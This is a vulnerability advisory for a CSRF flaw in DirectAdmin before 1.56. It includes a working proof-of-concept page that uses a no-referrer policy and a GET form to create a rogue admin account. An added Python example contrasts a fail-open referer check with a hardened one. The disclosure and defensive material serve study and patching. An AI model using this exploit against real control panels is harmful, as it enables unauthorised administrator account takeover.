Vulnerability

Affected software: DirectAdmin versions below 1.56

Someone reported a CSRF vulnerability in DirectAdmin on 2019-03-03; however, that exploit did not work because the check_referer protection is enabled by default. On further analysis I found another bug that allowed check_referer to be bypassed.

If the attacking page sets Referrer-Policy: no-referrer and submits the request with GET instead of POST, the referer check is bypassed and the CSRF succeeds: a rogue admin account is created if someone who is logged in to DirectAdmin as an admin follows the malicious link.

Exploit

It requires user interaction, but can be automated.

<?php
header("Referrer-Policy: no-referrer");
?>
<html>
  <body>
    <form action="https://HOST:2223/CMD_ACCOUNT_ADMIN" method="GET">
      <input type="hidden" name="fakeusernameremembered" value="" />
      <input type="hidden" name="fakepasswordremembered" value="" />
      <input type="hidden" name="action" value="create" />
      <input type="hidden" name="username" value="newadmin" />
      <input type="hidden" name="email" value="user@example.org" />
      <input type="hidden" name="passwd" value="password" />
      <input type="hidden" name="passwd2" value="password" />
      <input type="hidden" name="notify" value="yes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Solution

Update DirectAdmin to version 1.56 or later.
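
To make the defensive side concrete, the following is an added example written for this page, not code from DirectAdmin. It contrasts a referer check that fails open when the Referer header is absent (the behaviour that a no-referrer GET exploits) with one that fails closed, requires POST for state-changing commands and checks a per-session CSRF token. The host, session token, request shapes and the three constructed requests (the no-referrer GET described above, the earlier POST attempt that check_referer blocked, and a genuine same-origin submission) are assumptions; the page does not describe how the 1.56 fix is implemented.

```python
# Added example (not DirectAdmin's code): a fail-open referer check next to a
# fail-closed one, run against constructed requests that mirror the advisory.
from dataclasses import dataclass, field
from urllib.parse import urlsplit
import hmac

# Constructed sample values; the real panel host and session token are assumptions.
EXPECTED_HOST = "panel.example.org:2223"
SESSION_TOKEN = "c0ffee-session-csrf-token"


@dataclass
class Request:
    """Minimal stand-in for an incoming HTTP request."""
    method: str
    headers: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)


def _header_host(value):
    """host[:port] of the absolute URL in an Origin/Referer header, or None if absent."""
    if not value:
        return None
    return urlsplit(value).netloc.lower() or None


def weak_referer_check(req):
    """Fail-open check: only a present and foreign Referer is rejected.

    A page served with 'Referrer-Policy: no-referrer' makes the browser omit the
    Referer header entirely, so the request passes whatever its method.
    """
    ref = req.headers.get("Referer")
    if ref is None:
        return True          # nothing to compare -> accepted (the flaw)
    return _header_host(ref) == EXPECTED_HOST


def hardened_check(req, session_token):
    """Fail-closed check for state-changing commands.

    Requires POST, a same-origin Origin (or, failing that, Referer) header, and a
    CSRF token bound to the session. A request carrying neither Origin nor
    Referer is rejected rather than waved through.
    """
    if req.method.upper() != "POST":
        return False
    src = _header_host(req.headers.get("Origin")) or _header_host(req.headers.get("Referer"))
    if src != EXPECTED_HOST:  # also rejects src is None
        return False
    token = req.form.get("csrf_token", "")
    return hmac.compare_digest(token, session_token)


# Constructed requests modelling the scenarios in the advisory.
CREATE_ADMIN = {"action": "create", "username": "newadmin"}

# GET from a page with Referrer-Policy: no-referrer -> no Referer header at all.
CROSS_SITE_GET = Request("GET", headers={}, form=dict(CREATE_ADMIN))

# The earlier POST-based attempt: the browser still sends the foreign Referer.
CROSS_SITE_POST = Request("POST", headers={"Referer": "https://attacker.example/csrf.html"},
                          form=dict(CREATE_ADMIN))

# A genuine form submission from the panel itself, carrying the session's token.
LEGIT_POST = Request("POST",
                     headers={"Origin": "https://panel.example.org:2223",
                              "Referer": "https://panel.example.org:2223/CMD_ACCOUNT_ADMIN"},
                     form={**CREATE_ADMIN, "csrf_token": SESSION_TOKEN})


def evaluate():
    """Return {scenario: (weak_accepts, hardened_accepts)} for the three requests."""
    return {
        "cross_site_get": (weak_referer_check(CROSS_SITE_GET),
                           hardened_check(CROSS_SITE_GET, SESSION_TOKEN)),
        "cross_site_post": (weak_referer_check(CROSS_SITE_POST),
                            hardened_check(CROSS_SITE_POST, SESSION_TOKEN)),
        "legit_post": (weak_referer_check(LEGIT_POST),
                       hardened_check(LEGIT_POST, SESSION_TOKEN)),
    }


if __name__ == "__main__":
    for name, (weak, hard) in evaluate().items():
        print(f"{name:16s} weak_check={weak!s:5s} hardened_check={hard}")
```

Running it shows the no-referrer GET passing the weak check and failing the hardened one, the foreign-Referer POST failing both, and the same-origin POST passing both. The design point is that a referer check must treat a missing header as a rejection, because the sender controls whether the browser includes it, and that a token the attacker cannot read is the control that does not depend on headers at all.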

Timeline

  • 2019-03-?? - Vulnerability reported to vendor (I no longer have original report).
  • 2019-03-?? - Response from vendor.
  • 2019-03-18 - DirectAdmin version 1.56 released with vulnerability fixed.